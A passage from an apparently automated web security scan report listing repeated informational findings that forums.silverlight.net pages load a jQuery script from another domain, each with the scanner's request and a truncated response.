Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 27094
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:19:33 GMT; expires=Sun, 29-Jan-2012 23:19:33 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:39:33 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:19:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   XAML,
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.100. http://forums.silverlight.net/forums/p/217710/518307.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/p/217710/518307.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/p/217710/518307.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 25483
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:19:28 GMT; expires=Sun, 29-Jan-2012 23:19:28 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:39:28 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:19:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Questi
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.101. http://forums.silverlight.net/forums/p/217719/518310.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/p/217719/518310.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/p/217719/518310.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 29785
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:19:10 GMT; expires=Sun, 29-Jan-2012 23:19:10 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:39:10 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:19:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Do I r
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.102. http://forums.silverlight.net/forums/p/217724/518300.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/p/217724/518300.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/p/217724/518300.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 25057
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:20:24 GMT; expires=Sun, 29-Jan-2012 23:20:24 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:40:24 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:20:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   WP7 -
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.103. http://forums.silverlight.net/forums/p/217726/518308.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/p/217726/518308.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/p/217726/518308.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 23439
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:19:28 GMT; expires=Sun, 29-Jan-2012 23:19:28 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:39:28 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:19:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Callin
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.104. http://forums.silverlight.net/forums/p/217727/518309.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/p/217727/518309.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/p/217727/518309.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 23148
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:19:17 GMT; expires=Sun, 29-Jan-2012 23:19:17 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:39:17 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:19:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Astero
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.105. http://forums.silverlight.net/forums/t/217026.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/t/217026.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/t/217026.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 107388
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:19:06 GMT; expires=Sun, 29-Jan-2012 23:19:06 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:39:06 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:19:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Elemen
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.106. http://forums.silverlight.net/forums/t/217498.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/t/217498.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/t/217498.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 58442
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:53 GMT; expires=Sun, 29-Jan-2012 23:18:53 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:53 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   MVVM a
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.107. http://forums.silverlight.net/forums/t/217562.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/t/217562.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/t/217562.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 31566
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:54 GMT; expires=Sun, 29-Jan-2012 23:18:54 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:56 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Self-R
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.108. http://forums.silverlight.net/forums/t/217667.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/t/217667.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/t/217667.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 31813
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:19:00 GMT; expires=Sun, 29-Jan-2012 23:19:00 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:39:01 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:19:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Datagr
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.109. http://forums.silverlight.net/forums/t/217709.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/t/217709.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/t/217709.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 27069
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:51 GMT; expires=Sun, 29-Jan-2012 23:18:51 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:52 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   XAML,
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.110. http://forums.silverlight.net/forums/t/217710.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/t/217710.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/t/217710.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 25458
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:51 GMT; expires=Sun, 29-Jan-2012 23:18:51 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:52 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Questi
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.111. http://forums.silverlight.net/forums/t/217719.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/t/217719.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/t/217719.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 29760
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:49 GMT; expires=Sun, 29-Jan-2012 23:18:49 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:49 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Do I r
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

23.112. http://forums.silverlight.net/forums/t/217724.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/t/217724.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/t/217724.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 25032
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:19:00 GMT; expires=Sun, 29-Jan-2012 23:19:00 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:39:01 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:19:01 GMT
Connection: close


